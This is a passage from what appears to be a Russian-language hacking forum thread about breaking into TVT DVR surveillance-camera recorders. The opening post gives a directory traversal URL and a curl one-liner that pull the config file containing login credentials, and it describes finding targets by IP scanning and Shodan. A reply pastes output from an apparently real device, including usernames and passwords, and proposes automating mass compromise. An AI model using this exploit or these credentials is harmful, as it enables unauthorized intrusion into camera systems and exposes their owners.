• XSS.stack #1 – первый литературный журнал от юзеров форума

Взлом камер наблюдения

hack3core

floppy-диск
Пользователь
Регистрация
26.12.2014
Сообщения
7
Реакции
1
Intro

Всем братский приветос, хочу донести до Вас инфу, может и есть в паблике но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даж на Украина на донбасе в последние время начали в мелькать

Инфа

Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом
"TVT TD-2308SS-B DVR directory traversal", - регистратор на 16 камер + 2 вихода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с етой прошивкой. Атакующий может получить доступ до файлов конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.

Адрес где лежит конфигурационный файл.

Код:
http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat

Парсинг

Именно для меня на данный момент такой способо парсинга самый актуальный.
Юзаю я Advanced IP Scanner - линк на офф линк на офф


Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download

9lle6o.png


Вот такой вид имеет панель входа.

30as590.png



Вот код самого експлойта

Код:
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

Вот пример

2hfs780.png



Ну и все в итоге у нас юзер и пасс от панели

2ziy93q.png


Maybe End

Все очень и очень просто.
Есть ище поисковик Шодан через который тоже можно искать камеры.

Кому интересно будет развивать данную уязвимось, я всегда открытий для обшения.
Вопросы, замечания в жаббер.

Удачного взлома Вам, маленькие хакеры/

Автор hack3core. Любите Дамагу :yahoo:
 
Спасибо. Многим будет полезным. От меня +


curl http://190.147.169.XXX/../../../mnt/mtd/config/config.dat 2> /dev/null | strings
EDVR
time.windows.com
admin
*.Inter2013
MASTER
COVI205
dflorez
dkptador1
sistemas
240875poc
kledismanr
240875poc
CAMERA01
CAMERA02
CAMERA03
CAMERA04
CAMERA05
CAMERA06
CAMERA07
CAMERA08

Я заметил что логин и пасс всегда выдаются на одних и тех же местах (это логично т.к. читаем конфиг). Значит при помощи shodanhq.com + любого скриптового языка можно вообще все автоматизировать на 100%. Многие в этом топе наверняка зададутся вопросом профита. Я для себя не нашел такового.
 
Ar3s может быть реально кому-то будет интересно-)) автоматизировать - раз плюнуть, но надо этим заниматься, плюс это только ради увлечение=я -)
с меня уже хватит смотреть-) кста насмотрелся разного-)) чего только там не было :fuck:
BabaDook ну в принципе да, это чистая LFI
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх